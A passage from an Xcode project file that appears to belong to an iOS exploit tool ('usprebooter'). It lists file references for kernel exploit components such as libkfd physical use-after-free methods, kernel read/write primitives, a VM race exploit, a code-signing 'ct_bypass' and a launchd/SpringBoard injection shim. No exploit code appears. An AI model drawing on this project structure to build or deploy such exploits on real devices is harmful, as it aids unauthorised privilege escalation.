fileEncoding = 4; lastKnownFileType = text; name = springboardshimsignedinjected; path = RootHelperSample/launchdshim/SpringBoardShim/springboardshimsignedinjected; sourceTree = SOURCE_ROOT; }; C84002EC2B4A64E200C73950 /* launchdentitlements.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist; name = launchdentitlements.plist; path = RootHelperSample/launchdshim/launchdentitlements.plist; sourceTree = SOURCE_ROOT; }; C8BFCC782B3FFE560008D8FD /* cs_blobs.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = cs_blobs.h; sourceTree = ""; }; C8BFCC792B3FFE560008D8FD /* thanks_opa334dev_htrowii.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = thanks_opa334dev_htrowii.h; sourceTree = ""; }; C8BFCC7A2B3FFE560008D8FD /* utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = utils.h; sourceTree = ""; }; C8BFCC7B2B3FFE560008D8FD /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vnode.h; sourceTree = ""; }; C8BFCC7C2B3FFE560008D8FD /* proc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = proc.h; sourceTree = ""; }; C8BFCC7D2B3FFE560008D8FD /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; C8BFCC7E2B3FFE560008D8FD /* krw.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = krw.h; sourceTree = ""; }; C8BFCC7F2B3FFE560008D8FD /* fun.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = fun.m; sourceTree = ""; }; C8BFCC822B3FFE560008D8FD /* dir.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = dir.m; sourceTree = ""; }; C8BFCC842B3FFE560008D8FD /* utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = utils.m; sourceTree = ""; }; C8BFCC852B3FFE560008D8FD /* thanks_opa334dev_htrowii.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = thanks_opa334dev_htrowii.m; sourceTree = ""; }; C8BFCC862B3FFE560008D8FD /* cs_blobs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = cs_blobs.m; sourceTree = ""; }; C8BFCC872B3FFE560008D8FD /* krw.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = krw.c; sourceTree = ""; }; C8BFCC882B3FFE560008D8FD /* offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = ""; }; C8BFCC892B3FFE560008D8FD /* vnode.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = vnode.m; sourceTree = ""; }; C8BFCC8A2B3FFE560008D8FD /* proc.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = proc.c; sourceTree = ""; }; C8BFCC8C2B3FFE560008D8FD /* fun.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = fun.h; sourceTree = ""; }; C8BFCC8F2B3FFE560008D8FD /* dir.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = dir.h; sourceTree = ""; }; C8BFCC912B3FFE560008D8FD /* krkw.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = krkw.h; sourceTree = ""; }; C8BFCC942B3FFE560008D8FD /* kread_sem_open.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kread_sem_open.h; sourceTree = ""; }; C8BFCC952B3FFE560008D8FD /* kread_kqueue_workloop_ctl.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kread_kqueue_workloop_ctl.h; sourceTree = ""; }; C8BFCC972B3FFE560008D8FD /* kwrite_sem_open.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kwrite_sem_open.h; sourceTree = ""; }; C8BFCC982B3FFE560008D8FD /* kwrite_dup.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kwrite_dup.h; sourceTree = ""; }; C8BFCC9A2B3FFE560008D8FD /* static_info.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = static_info.h; sourceTree = ""; }; C8BFCC9B2B3FFE560008D8FD /* dynamic_info.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = dynamic_info.h; sourceTree = ""; }; C8BFCC9C2B3FFE560008D8FD /* puaf.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = puaf.h; sourceTree = ""; }; C8BFCC9D2B3FFE560008D8FD /* common.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = ""; }; C8BFCC9F2B3FFE560008D8FD /* smith.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = smith.h; sourceTree = ""; }; C8BFCCA02B3FFE560008D8FD /* physpuppet.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = physpuppet.h; sourceTree = ""; }; C8BFCCA12B3FFE560008D8FD /* perf.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = perf.h; sourceTree = ""; }; C8BFCCA22B3FFE560008D8FD /* info.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = info.h; sourceTree = ""; }; C8BFCCA32B3FFE570008D8FD /* libkfd.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = libkfd.h; sourceTree = ""; }; C8BFCCB32B427C0F0008D8FD /* Log.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = Log.swift; sourceTree = ""; }; D6E08F1D2B48B04E00AE49BF /* TheCoolerContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = TheCoolerContentView.swift; sourceTree = ""; }; D6E08F2E2B48E24E00AE49BF /* UTTagClass.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = UTTagClass.swift; sourceTree = ""; }; D6E08F2F2B48E24E00AE49BF /* CoreTypes.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = CoreTypes.swift; sourceTree = ""; }; D6E08F302B48E24E00AE49BF /* UTType.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = UTType.swift; sourceTree = ""; }; D6E08F322B48E24E00AE49BF /* URLSession+Async.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "URLSession+Async.swift"; sourceTree = ""; }; D6E08F352B48E24E00AE49BF /* Never+Representation.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "Never+Representation.swift"; sourceTree = ""; }; D6E08F362B48E24F00AE49BF /* Tuple+Representation.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "Tuple+Representation.swift"; sourceTree = ""; }; D6E08F372B48E24F00AE49BF /* Codable+Representation.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "Codable+Representation.swift"; sourceTree = ""; }; D6E08F382B48E24F00AE49BF /* Data+Representation.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "Data+Representation.swift"; sourceTree = ""; }; D6E08F392B48E24F00AE49BF /* _ConditionalRepresentation.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = _ConditionalRepresentation.swift; sourceTree = ""; }; D6E08F3A2B48E24F00AE49BF /* File+Representations.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "File+Representations.swift"; sourceTree = ""; }; D6E08F3C2B48E24F00AE49BF /* Data+Transferable.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "Data+Transferable.swift"; sourceTree = ""; }; D6E08F3D2B48E24F00AE49BF /* URL+Transferable.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "URL+Transferable.swift"; sourceTree = ""; }; D6E08F3E2B48E24F00AE49BF /* String+Transferable.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "String+Transferable.swift"; sourceTree = ""; }; D6E08F3F2B48E24F00AE49BF /* Never+Transferable.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "Never+Transferable.swift"; sourceTree = ""; }; D6E08F402B48E24F00AE49BF /* AttributedString+Transferable.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "AttributedString+Transferable.swift"; sourceTree = ""; }; D6E08F422B48E24F00AE49BF /* Visibility.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Visibility.swift; sourceTree = ""; }; D6E08F432B48E24F00AE49BF /* SentTransferredFile.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = SentTransferredFile.swift; sourceTree = ""; }; D6E08F442B48E24F00AE49BF /* ReceivedTransferredFile.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = ReceivedTransferredFile.swift; sourceTree = ""; }; D6E08F452B48E24F00AE49BF /* NSItemProvider+Transferable.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "NSItemProvider+Transferable.swift"; sourceTree = ""; }; D6E08F462B48E24F00AE49BF /* Transferable.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Transferable.swift; sourceTree = ""; }; D6E08F472B48E24F00AE49BF /* TransferRepresentationBuilder.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = TransferRepresentationBuilder.swift; sourceTree = ""; }; D6E08F482B48E24F00AE49BF /* TransferableRepresentation.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = TransferableRepresentation.swift; sourceTree = ""; }; D6E08F492B48E24F00AE49BF /* Backport.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Backport.swift; sourceTree = ""; }; D6E08F632B48E25E00AE49BF /* Platforms.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Platforms.swift; sourceTree = ""; }; D6E08F642B48E25E00AE49BF /* SafeArea.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = SafeArea.swift; sourceTree = ""; }; D6E08F652B48E25E00AE49BF /* Environment.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Environment.swift; sourceTree = ""; }; D6E08F662B48E25E00AE49BF /* Environment+String.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "Environment+String.swift"; sourceTree = ""; }; D6E08F672B48E25E00AE49BF /* OwningController.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = OwningController.swift; sourceTree = ""; }; D6E08F682B48E25E00AE49BF /* NSItemProvider+Async.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "NSItemProvider+Async.swift"; sourceTree = ""; }; D6E08F692B48E25E00AE49BF /* UIScene.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = UIScene.swift; sourceTree = ""; }; D6E08F6A2B48E25E00AE49BF /* Inspect.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Inspect.swift; sourceTree = ""; }; D6E08F6B2B48E25E00AE49BF /* String+LocalizationKey.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "String+LocalizationKey.swift"; sourceTree = ""; }; D6E08F6D2B48E25F00AE49BF /* VisualEffect+iOS.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "VisualEffect+iOS.swift"; sourceTree = ""; }; D6E08F6E2B48E25F00AE49BF /* VisualEffect+macOS.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "VisualEffect+macOS.swift"; sourceTree = ""; }; D6E090022B48E25F00AE49BF /* Detents.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Detents.swift; sourceTree = ""; }; D6E0900C2B48E25F00AE49BF /* UIBackport.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = UIBackport.swift; sourceTree = ""; }; D6E090872B48E3A200AE49BF /* BlobLayer.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = BlobLayer.swift; sourceTree = ""; }; D6E090882B48E3A200AE49BF /* ResizableLayer.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = ResizableLayer.swift; sourceTree = ""; }; D6E090892B48E3A200AE49BF /* FluidGradientView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = FluidGradientView.swift; sourceTree = ""; }; D6E0908A2B48E3A200AE49BF /* CGPoint+Extensions.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "CGPoint+Extensions.swift"; sourceTree = ""; }; D6E0908B2B48E3A200AE49BF /* FluidGradient.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = FluidGradient.swift; sourceTree = ""; }; D6E090922B48E60300AE49BF /* bootstrap.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = bootstrap.h; sourceTree = ""; }; D6E090942B48E60300AE49BF /* endpoint.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = endpoint.h; sourceTree = ""; }; D6E090952B48E60300AE49BF /* debug.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = debug.h; sourceTree = ""; }; D6E090962B48E60300AE49BF /* listener.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = listener.h; sourceTree = ""; }; D6E090972B48E60300AE49BF /* availability.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = availability.h; sourceTree = ""; }; D6E090982B48E60300AE49BF /* rich_error.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = rich_error.h; sourceTree = ""; }; D6E090992B48E60300AE49BF /* xpc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = xpc.h; sourceTree = ""; }; D6E0909A2B48E60300AE49BF /* session.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = session.h; sourceTree = ""; }; D6E0909B2B48E60300AE49BF /* xpc_connection.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = xpc_connection.h; sourceTree = ""; }; D6E0909C2B48E60300AE49BF /* activity.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = activity.h; sourceTree = ""; }; D6E0909D2B48E60300AE49BF /* launch.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = launch.h; sourceTree = ""; }; D6E0909E2B48E60300AE49BF /* base.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = base.h; sourceTree = ""; }; D6F9CF3E2B4B2F7D00274803 /* ct_bypass */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = ct_bypass; path = ChOma/output/ios/tests/ct_bypass; sourceTree = ""; }; D6F9CF402B4B306400274803 /* fastPathSign */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = fastPathSign; path = RootHelperSample/Exploits/fastPathSign/fastPathSign; sourceTree = ""; }; D6F9CF422B4B7B5A00274803 /* boot-sad.jp2 */ = {isa = PBXFileReference; lastKnownFileType = file; path = "boot-sad.jp2"; sourceTree = ""; }; D6F9CF432B4B7B5A00274803 /* boot-happy.jp2 */ = {isa = PBXFileReference; lastKnownFileType = file; path = "boot-happy.jp2"; sourceTree = ""; }; /* End PBXFileReference section */ /* Begin PBXFrameworksBuildPhase section */ C81122972B15E7BB00AD077B /* Frameworks */ = { isa = PBXFrameworksBuildPhase; buildActionMask = 2147483647; files = ( C82AFF3F2B179A8C0070EA49 /* IOKit.framework in Frameworks */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXFrameworksBuildPhase section */ /* Begin PBXGroup section */ C81122912B15E7BB00AD077B = { isa = PBXGroup; children = ( D6F9CF402B4B306400274803 /* fastPathSign */, D6F9CF3E2B4B2F7D00274803 /* ct_bypass */, C82AFF0A2B1762CE0070EA49 /* RootHelperSample */, C811229C2B15E7BB00AD077B /* usprebooter */, C811229B2B15E7BB00AD077B /* Products */, C82AFF3B2B1796D90070EA49 /* Frameworks */, ); sourceTree = ""; }; C811229B2B15E7BB00AD077B /* Products */ = { isa = PBXGroup; children = ( C811229A2B15E7BB00AD077B /* usprebooter.app */, ); name = Products; sourceTree = ""; }; C811229C2B15E7BB00AD077B /* usprebooter */ = { isa = PBXGroup; children = ( D6F9CF432B4B7B5A00274803 /* boot-happy.jp2 */, D6F9CF422B4B7B5A00274803 /* boot-sad.jp2 */, C84002EC2B4A64E200C73950 /* launchdentitlements.plist */, C84002E82B4A55A300C73950 /* springboardshimsignedinjected */, C8BFCC772B3FFE560008D8FD /* fun */, C8BFCC902B3FFE560008D8FD /* libkfd */, C8BFCCA32B3FFE570008D8FD /* libkfd.h */, C82AFF422B17AA6C0070EA49 /* ldid */, C82AFEF32B175AB80070EA49 /* Assets.xcassets */, D6E090912B48E60300AE49BF /* Private Headers I stole from the macOS SDK */, C82AFEEF2B175A270070EA49 /* ContentView.swift */, D6E08F1D2B48B04E00AE49BF /* TheCoolerContentView.swift */, C82AFEF12B175AA30070EA49 /* usprebooterApp.swift */, D6E08F2B2B48E24400AE49BF /* External */, C81122AB2B15E7BD00AD077B /* Info.plist */, C81122CF2B15EA8600AD077B /* usprebooter-Bridging-Header.h */, C81122DD2B16C9CB00AD077B /* troller.h */, C81122DE2B16C9CC00AD077B /* troller.m */, C805CA442B1719C1005157BA /* util.m */, C805CA462B1719D5005157BA /* util.h */, C83594D32B18F80300346F80 /* overwriter.h */, C83594CE2B18F70700346F80 /* overwriter.m */, C83594D02B18F74600346F80 /* vm_unaligned_copy_switch_race.h */, C83594D12B18F74600346F80 /* vm_unaligned_copy_switch_race.c */, C8BFCCB32B427C0F0008D8FD /* Log.swift */, 013141FE2B445B26006BEBE9 /* memoryControl.m */, 013142012B445B48006BEBE9 /* memoryControl.h */, ); path = usprebooter; sourceTree = ""; }; C82AFF0A2B1762CE0070EA49 /* RootHelperSample */ = { isa = PBXGroup; children = ( C82AFF0C2B1762CE0070EA49 /* .theos */, C82AFF2B2B1762CE0070EA49 /* Makefile */, C82AFF2C2B1762CE0070EA49 /* entitlements.plist */, C82AFF2D2B1762CE0070EA49 /* TSUtil.m */, C82AFF2E2B1762CE0070EA49 /* RootHelperSample.xcodeproj */, C82AFF312B1762CE0070EA49 /* main.m */, C84002E32B4A545400C73950 /* insert_dylib.m */, C84002E52B4A547B00C73950 /* insert_dylib.h */, C82AFF332B1762CE0070EA49 /* TSUtil.h */, C82AFF342B1762CE0070EA49 /* CoreServices.h */, C82AFF352B1762CE0070EA49 /* RemoteLog.h */, C82AFF362B1762CE0070EA49 /* control */, ); path = RootHelperSample; sourceTree = ""; }; C82AFF0C2B1762CE0070EA49 /* .theos */ = { isa = PBXGroup; children = ( C82AFF0D2B1762CE0070EA49 /* fakeroot */, C82AFF0E2B1762CE0070EA49 /* obj */, C82AFF262B1762CE0070EA49 /* swift */, C82AFF282B1762CE0070EA49 /* packages */, C82AFF2A2B1762CE0070EA49 /* build_session */, ); path = .theos; sourceTree = ""; }; C82AFF0E2B1762CE0070EA49 /* obj */ = { isa = PBXGroup; children = ( C82AFF0F2B1762CE0070EA49 /* debug */, ); path = obj; sourceTree = ""; }; C82AFF0F2B1762CE0070EA49 /* debug */ = { isa = PBXGroup; children = ( C82AFF102B1762CE0070EA49 /* trolltoolsroothelper */, C82AFF112B1762CE0070EA49 /* .stamp */, C82AFF122B1762CE0070EA49 /* arm64 */, ); path = debug; sourceTree = ""; }; C82AFF122B1762CE0070EA49 /* arm64 */ = { isa = PBXGroup; children = ( C82AFF132B1762CE0070EA49 /* uicache.m.df2b699c.Td */, C82AFF142B1762CE0070EA49 /* main.m.cb550517.Td */, C82AFF152B1762CE0070EA49 /* uicache.m.1773e4a4.Td */, C82AFF162B1762CE0070EA49 /* main.m.1773e4a4.o */, C82AFF172B1762CE0070EA49 /* uicache.m.1773e4a4.o */, C82AFF182B1762CE0070EA49 /* TSUtil.m.1773e4a4.Td */, C82AFF192B1762CE0070EA49 /* main.m.df2b699c.o */, C82AFF1A2B1762CE0070EA49 /* TSUtil.m.cb550517.o */, C82AFF1B2B1762CE0070EA49 /* trolltoolsroothelper.dSYM */, C82AFF1C2B1762CE0070EA49 /* TSUtil.m.df2b699c.Td */, C82AFF1D2B1762CE0070EA49 /* uicache.m.df2b699c.o */, C82AFF1E2B1762CE0070EA49 /* TSUtil.m.cb550517.Td */, C82AFF1F2B1762CE0070EA49 /* TSUtil.m.1773e4a4.o */, C82AFF202B1762CE0070EA49 /* main.m.df2b699c.Td */, C82AFF212B1762CE0070EA49 /* main.m.1773e4a4.Td */, C82AFF222B1762CE0070EA49 /* uicache.m.cb550517.o */, C82AFF232B1762CE0070EA49 /* uicache.m.cb550517.Td */, C82AFF242B1762CE0070EA49 /* TSUtil.m.df2b699c.o */, C82AFF252B1762CE0070EA49 /* main.m.cb550517.o */, ); path = arm64; sourceTree = ""; }; C82AFF262B1762CE0070EA49 /* swift */ = { isa = PBXGroup; children = ( C82AFF272B1762CE0070EA49 /* markers */, ); path = swift; sourceTree = ""; }; C82AFF272B1762CE0070EA49 /* markers */ = { isa = PBXGroup; children = ( ); path = markers; sourceTree = ""; }; C82AFF282B1762CE0070EA49 /* packages */ = { isa = PBXGroup; children = ( C82AFF292B1762CE0070EA49 /* net.sourceloc.trolltoolsroothelper-1.0 */, ); path = packages; sourceTree = ""; }; C82AFF2F2B1762CE0070EA49 /* Products */ = { isa = PBXGroup; children = ( ); name = Products; sourceTree = ""; }; C82AFF3B2B1796D90070EA49 /* Frameworks */ = { isa = PBXGroup; children = ( C83594C32B17AC8500346F80 /* MobileContainerManager.framework */, C82AFF3D2B179A880070EA49 /* IOKit.framework */, C82AFF3C2B1796D90070EA49 /* IOKit.tbd */, ); name = Frameworks; sourceTree = ""; }; C8BFCC772B3FFE560008D8FD /* fun */ = { isa = PBXGroup; children = ( C8BFCC782B3FFE560008D8FD /* cs_blobs.h */, C8BFCC792B3FFE560008D8FD /* thanks_opa334dev_htrowii.h */, C8BFCC7A2B3FFE560008D8FD /* utils.h */, C8BFCC842B3FFE560008D8FD /* utils.m */, C8BFCC7B2B3FFE560008D8FD /* vnode.h */, C8BFCC892B3FFE560008D8FD /* vnode.m */, C8BFCC7C2B3FFE560008D8FD /* proc.h */, C8BFCC7D2B3FFE560008D8FD /* offsets.h */, C8BFCC7E2B3FFE560008D8FD /* krw.h */, C8BFCC7F2B3FFE560008D8FD /* fun.m */, C8BFCC822B3FFE560008D8FD /* dir.m */, C8BFCC852B3FFE560008D8FD /* thanks_opa334dev_htrowii.m */, C8BFCC862B3FFE560008D8FD /* cs_blobs.m */, C8BFCC872B3FFE560008D8FD /* krw.c */, C8BFCC882B3FFE560008D8FD /* offsets.m */, C8BFCC8A2B3FFE560008D8FD /* proc.c */, C8BFCC8C2B3FFE560008D8FD /* fun.h */, C8BFCC8F2B3FFE560008D8FD /* dir.h */, ); path = fun; sourceTree = ""; }; C8BFCC902B3FFE560008D8FD /* libkfd */ = { isa = PBXGroup; children = ( C8BFCC912B3FFE560008D8FD /* krkw.h */, C8BFCC922B3FFE560008D8FD /* krkw */, C8BFCC992B3FFE560008D8FD /* info */, C8BFCC9C2B3FFE560008D8FD /* puaf.h */, C8BFCC9D2B3FFE560008D8FD /* common.h */, C8BFCC9E2B3FFE560008D8FD /* puaf */, C8BFCCA12B3FFE560008D8FD /* perf.h */, C8BFCCA22B3FFE560008D8FD /* info.h */, ); path = libkfd; sourceTree = ""; }; C8BFCC922B3FFE560008D8FD /* krkw */ = { isa = PBXGroup; children = ( C8BFCC932B3FFE560008D8FD /* kread */, C8BFCC962B3FFE560008D8FD /* kwrite */, ); path = krkw; sourceTree = ""; }; C8BFCC932B3FFE560008D8FD /* kread */ = { isa = PBXGroup; children = ( C8BFCC942B3FFE560008D8FD /* kread_sem_open.h */, C8BFCC952B3FFE560008D8FD /* kread_kqueue_workloop_ctl.h */, ); path = kread; sourceTree = ""; }; C8BFCC962B3FFE560008D8FD /* kwrite */ = { isa = PBXGroup; children = ( C8BFCC972B3FFE560008D8FD /* kwrite_sem_open.h */, C8BFCC982B3FFE560008D8FD /* kwrite_dup.h */, ); path = kwrite; sourceTree = ""; }; C8BFCC992B3FFE560008D8FD /* info */ = { isa = PBXGroup; children = ( C8BFCC9A2B3FFE560008D8FD /* static_info.h */, C8BFCC9B2B3FFE560008D8FD /* dynamic_info.h */, ); path = info; sourceTree = ""; }; C8BFCC9E2B3FFE560008D8FD /* puaf */ = { isa = PBXGroup; children = ( C8BFCC9F2B3FFE560008D8FD /* smith.h */, C8BFCCA02B3FFE560008D8FD /* physpuppet.h */, ); path = puaf; sourceTree = ""; }; D6E08F2B2B48E24400AE49BF /* External */ = { isa = PBXGroup; children = ( D6E090862B48E3A200AE49BF /* FluidGradient */, D6E08F612B48E25E00AE49BF /* SwiftUIBackports */, D6E08F2C2B48E24E00AE49BF /* SwiftBackports */, ); path = External; sourceTree = ""; }; D6E08F2C2B48E24E00AE49BF /* SwiftBackports */ = { isa = PBXGroup; children = ( D6E08F2D2B48E24E00AE49BF /* UniformTypeIdentifiers */, D6E08F312B48E24E00AE49BF /* URLSession */, D6E08F332B48E24E00AE49BF /* CoreTransferable */, D6E08F492B48E24F00AE49BF /* Backport.swift */, ); path = SwiftBackports; sourceTree = ""; }; D6E08F2D2B48E24E00AE49BF /* UniformTypeIdentifiers */ = { isa = PBXGroup; children = ( D6E08F2E2B48E24E00AE49BF /* UTTagClass.swift */, D6E08F2F2B48E24E00AE49BF /* CoreTypes.swift */, D6E08F302B48E24E00AE49BF /* UTType.swift */, ); path = UniformTypeIdentifiers; sourceTree = ""; }; D6E08F312B48E24E00AE49BF /* URLSession */ = { isa = PBXGroup; children = ( D6E08F322B48E24E00AE49BF /* URLSession+Async.swift */, ); path = URLSession; sourceTree = ""; }; D6E08F332B48E24E00AE49BF /* CoreTransferable */ = { isa = PBXGroup; children = ( D6E08F342B48E24E00AE49BF /* Representations */, D6E08F3B2B48E24F00AE49BF /* Transferables */, D6E08F412B48E24F00AE49BF /* Support */, D6E08F462B48E24F00AE49BF /* Transferable.swift */, D6E08F472B48E24F00AE49BF /* TransferRepresentationBuilder.swift */, D6E08F482B48E24F00AE49BF /* TransferableRepresentation.swift */, ); path = CoreTransferable; sourceTree = ""; }; D6E08F342B48E24E00AE49BF /* Representations */ = { isa = PBXGroup; children = ( D6E08F352B48E24E00AE49BF /* Never+Representation.swift */, D6E08F362B48E24F00AE49BF /* Tuple+Representation.swift */, D6E08F372B48E24F00AE49BF /* Codable+Representation.swift */, D6E08F382B48E24F00AE49BF /* Data+Representation.swift */, D6E08F392B48E24F00AE49BF /* _ConditionalRepresentation.swift */, D6E08F3A2B48E24F00AE49BF /* File+Representations.swift */, ); path = Representations; sourceTree = ""; }; D6E08F3B2B48E24F00AE49BF /* Transferables */ = { isa = PBXGroup; children = ( D6E08F3C2B48E24F00AE49BF /* Data+Transferable.swift */, D6E08F3D2B48E24F00AE49BF /* URL+Transferable.swift */, D6E08F3E2B48E24F00AE49BF /* String+Transferable.swift */, D6E08F3F2B48E24F00AE49BF /* Never+Transferable.swift */, D6E08F402B48E24F00AE49BF /* AttributedString+Transferable.swift */, ); path = Transferables; sourceTree = ""; }; D6E08F412B48E24F00AE49BF /* Support */ = { isa = PBXGroup; children = ( D6E08F422B48E24F00AE49BF /* Visibility.swift */, D6E08F432B48E24F00AE49BF /* SentTransferredFile.swift */, D6E08F442B48E24F00AE49BF /* ReceivedTransferredFile.swift */, D6E08F452B48E24F00AE49BF /* NSItemProvider+Transferable.swift */, ); path = Support; sourceTree = ""; }; D6E08F612B48E25E00AE49BF /* SwiftUIBackports */ = { isa = PBXGroup; children = ( D6E08F622B48E25E00AE49BF 